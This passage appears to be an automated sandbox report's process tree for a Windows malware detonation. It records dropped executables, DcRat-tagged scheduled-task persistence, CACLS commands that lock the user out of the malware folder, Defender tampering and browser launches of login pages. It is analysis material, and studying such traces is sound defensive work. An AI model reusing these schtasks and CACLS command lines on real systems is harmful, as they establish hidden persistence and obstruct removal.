        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2108
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4EV380Bx.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4EV380Bx.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2364
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:4520
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Bn8IZ2.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Bn8IZ2.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
      "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2532
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:3000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3800
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:384
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        6⤵
        
        PID:4484
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        6⤵
        
        PID:4888
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:1800
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        6⤵
        
        PID:5008
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        6⤵
        
        PID:3712
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:4432
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6OD3In9.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6OD3In9.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2006.tmp\2007.tmp\2018.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6OD3In9.exe"
    3⤵
    PID:4060
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
      4⤵
      PID:3416
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbcadf46f8,0x7ffbcadf4708,0x7ffbcadf4718
        5⤵
        
        PID:1408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,4085110387135517367,14453274919528005191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
        5⤵
        
        PID:3544
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,4085110387135517367,14453274919528005191,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1988 /prefetch:2
        5⤵
        
        PID:3908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbcadf46f8,0x7ffbcadf4708,0x7ffbcadf4718
        5⤵
        
        PID:1008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2448 /prefetch:8
        5⤵
        
        PID:4260
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
        5⤵
        
        PID:2156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
        5⤵
        
        PID:4628
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
        5⤵
        
        PID:1608
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        5⤵
        
        PID:4048
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:1
        5⤵
        
        PID:4136
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
        5⤵
        
        PID:4160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
        5⤵
        
        PID:1668
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4372 /prefetch:1
        5⤵
        
        PID:5148
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
        5⤵
        
        PID:5924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
        5⤵
        
        PID:5916
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6684 /prefetch:8
        5⤵
        
        PID:5960
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6684 /prefetch:8
        5⤵
        
        PID:5976
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
        5⤵
        
        PID:5308
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
        5⤵
        
        PID:5372
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3472 /prefetch:8
        5⤵
        
        PID:4068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
        5⤵
        
        PID:5872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
        5⤵
        
        PID:6012
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,16873805625086918133,2854272929597475812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
        5⤵
        
        PID:5512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:4696
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbcadf46f8,0x7ffbcadf4708,0x7ffbcadf4718
        5⤵
        
        PID:644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,297930337057392795,4827839112324079529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
        5⤵
        
        PID:5108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,297930337057392795,4827839112324079529,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
        5⤵
        
        PID:4556

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3236
- C:\Users\Admin\AppData\Local\Temp\66B4.exe
  C:\Users\Admin\AppData\Local\Temp\66B4.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3076
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vV7Xk4tL.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vV7Xk4tL.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:2064
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gc3sV5hO.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gc3sV5hO.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:3436
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ao0jX7Xa.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ao0jX7Xa.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:1676
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\af0pT6aw.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\af0pT6aw.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5908
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Xo82fC5.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Xo82fC5.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1352
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:1548
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 540
        9⤵
        Program crash
        
        PID:4416
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 540
        9⤵
        Program crash
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Kn148MN.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Kn148MN.exe
        7⤵
        Executes dropped EXE
        
        PID:5792
- C:\Users\Admin\AppData\Local\Temp\688A.exe
  C:\Users\Admin\AppData\Local\Temp\688A.exe
  2⤵
  - Executes dropped EXE
  PID:5544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6A02.bat" "
  2⤵
  PID:5088
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
    3⤵
    PID:1908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbcadf46f8,0x7ffbcadf4708,0x7ffbcadf4718
      4⤵
      PID:2056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
    3⤵
    PID:5952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffbcadf46f8,0x7ffbcadf4708,0x7ffbcadf4718
      4⤵
      PID:5996
- C:\Users\Admin\AppData\Local\Temp\6AFD.exe
  C:\Users\Admin\AppData\Local\Temp\6AFD.exe
  2⤵
  - Executes dropped EXE
  PID:4264
- C:\Users\Admin\AppData\Local\Temp\708C.exe
  C:\Users\Admin\AppData\Local\Temp\708C.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious use of AdjustPrivilegeToken
  PID:5172
- C:\Users\Admin\AppData\Local\Temp\731D.exe
  C:\Users\Admin\AppData\Local\Temp\731D.exe
  2⤵
  - Executes dropped EXE
  PID:2404
- C:\Users\Admin\AppData\Local\Temp\7744.exe
  C:\Users\Admin\AppData\Local\Temp\7744.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5364
- C:\Users\Admin\AppData\Local\Temp\9964.exe
  C:\Users\Admin\AppData\Local\Temp\9964.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:4268
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5928
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:404
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:3456
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:4216
- - C:\Users\Admin\AppData\Local\Temp\kos2.exe
    "C:\Users\Admin\AppData\Local\Temp\kos2.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:6048
  - - C:\Users\Admin\AppData\Local\Temp\set16.exe
      "C:\Users\Admin\AppData\Local\Temp\set16.exe"
      4⤵
      Executes dropped EXE
      PID:4596
    - - C:\Users\Admin\AppData\Local\Temp\is-MEKKK.tmp\is-65F7P.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MEKKK.tmp\is-65F7P.tmp" /SL4 $70230 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:3800
      - C:\Program Files (x86)\MyBurn\MyBurn.exe
        
        "C:\Program Files (x86)\MyBurn\MyBurn.exe" -i
        6⤵
        Executes dropped EXE
        
        PID:4644
      - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" helpmsg 20
        6⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 20
        7⤵
        
        PID:1156
      - C:\Program Files (x86)\MyBurn\MyBurn.exe
        
        "C:\Program Files (x86)\MyBurn\MyBurn.exe" -s
        6⤵
        Executes dropped EXE
        
        PID:5840
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Query
        6⤵
        
        PID:3844
  - - C:\Users\Admin\AppData\Local\Temp\K.exe
      "C:\Users\Admin\AppData\Local\Temp\K.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:4456
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    PID:3740
- C:\Users\Admin\AppData\Local\Temp\B71E.exe
  C:\Users\Admin\AppData\Local\Temp\B71E.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4624
- C:\Users\Admin\AppData\Local\Temp\B7DB.exe
  C:\Users\Admin\AppData\Local\Temp\B7DB.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3908
- C:\Users\Admin\AppData\Local\Temp\BF2F.exe
  C:\Users\Admin\AppData\Local\Temp\BF2F.exe
  2⤵
  - Executes dropped EXE
  PID:1336
- C:\Users\Admin\AppData\Local\Temp\C6B1.exe
  C:\Users\Admin\AppData\Local\Temp\C6B1.exe
  2⤵
  - Executes dropped EXE
  PID:4676
- C:\Users\Admin\AppData\Local\Temp\E91F.exe
  C:\Users\Admin\AppData\Local\Temp\E91F.exe
  2⤵
  - Executes dropped EXE
  PID:2292
- C:\Users\Admin\AppData\Local\Temp\132E.exe
  C:\Users\Admin\AppData\Local\Temp\132E.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3152
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "calc" /tr '"C:\Users\Admin\AppData\Roaming\calc.exe"' & exit
    3⤵
    PID:5152
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "calc" /tr '"C:\Users\Admin\AppData\Roaming\calc.exe"'
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3629.tmp.bat""
    3⤵
    PID:2176
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3124
  - - C:\Users\Admin\AppData\Roaming\calc.exe
      "C:\Users\Admin\AppData\Roaming\calc.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3368
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
